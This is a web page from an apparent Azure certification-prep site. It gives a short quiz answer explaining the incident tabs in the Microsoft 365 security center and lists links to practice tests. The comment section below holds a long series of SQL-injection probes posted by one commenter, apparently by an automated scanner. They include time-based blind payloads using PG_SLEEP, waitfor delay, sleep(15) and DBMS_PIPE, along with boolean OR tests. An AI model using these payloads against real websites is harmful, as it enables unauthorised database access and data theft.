What part of Microsoft 365 security center do you use to identify users and devices affected by alert?

Experience Level: Junior
Tags: Microsoft Defender

Answer

Use Incidents. 
The additional tabs for an incident are:

Alerts - All the alerts related to the incident and their information.

Devices - All the devices that have been identified to be part of or related to the incident.

Users - All the users that have been identified to be part of or related to the incident.

Mailboxes - All the mailboxes that have been identified to be part of or related to the incident.

Investigations - All the automated investigations triggered by alerts in the incident.

Evidence and Response - All the supported events and suspicious entities in the alerts of the incident.

Summary - A quick overview of the impacted assets associated with alerts.
Azure - Compliance for beginners
Azure - Compliance for beginners

Are you learning Azure Cloud ? Try our test we designed to help you progress faster.

Test yourself
Azure - Security for beginners
Azure - Security for beginners

Are you learning Azure Cloud ? Try our test we designed to help you progress faster.

Test yourself
Azure - Governance for beginners
Azure - Governance for beginners

Are you learning Azure Cloud ? Try our test we designed to help you progress faster.

Test yourself
SC-900: Microsoft Security, Compliance, and Identity Fundamentals preparation
SC-900: Microsoft Security, Compliance, and Identity Fundamentals preparation

Are you learning Azure Cloud ? Try our test we designed to help you progress faster.

Test yourself

Chat

Oh, the operator is not available. Leave us your comments. We will answer all your questions as soon as possible.

Comments

RiceHawk18
e
RiceHawk18
@@xeDO0
RiceHawk18
1'"
RiceHawk18
e'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
RiceHawk18
L7oVYP7m')) OR 312=(SELECT 312 FROM PG_SLEEP(15))--
RiceHawk18
A1v25QPv') OR 393=(SELECT 393 FROM PG_SLEEP(15))--
RiceHawk18
kxT46vOm' OR 479=(SELECT 479 FROM PG_SLEEP(15))--
RiceHawk18
VTgcz37T'; waitfor delay '0:0:15' --
RiceHawk18
1 waitfor delay '0:0:15' --
RiceHawk18
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
RiceHawk18
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
RiceHawk18
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
RiceHawk18
if(now()=sysdate(),sleep(15),0)
RiceHawk18
-1" OR 3+906-906-1=0+0+0+1 --
RiceHawk18
-1" OR 2+906-906-1=0+0+0+1 --
RiceHawk18
-1' OR 3+316-316-1=0+0+0+1 or '8BoDIAd6'='
RiceHawk18
-1' OR 2+316-316-1=0+0+0+1 or '8BoDIAd6'='
RiceHawk18
-1' OR 3+137-137-1=0+0+0+1 --
RiceHawk18
-1' OR 2+137-137-1=0+0+0+1 --
RiceHawk18
-1 OR 3+877-877-1=0+0+0+1
RiceHawk18
-1 OR 2+877-877-1=0+0+0+1
RiceHawk18
-1 OR 3+418-418-1=0+0+0+1 --
RiceHawk18
-1 OR 2+418-418-1=0+0+0+1 --
RiceHawk18
e
RiceHawk18
e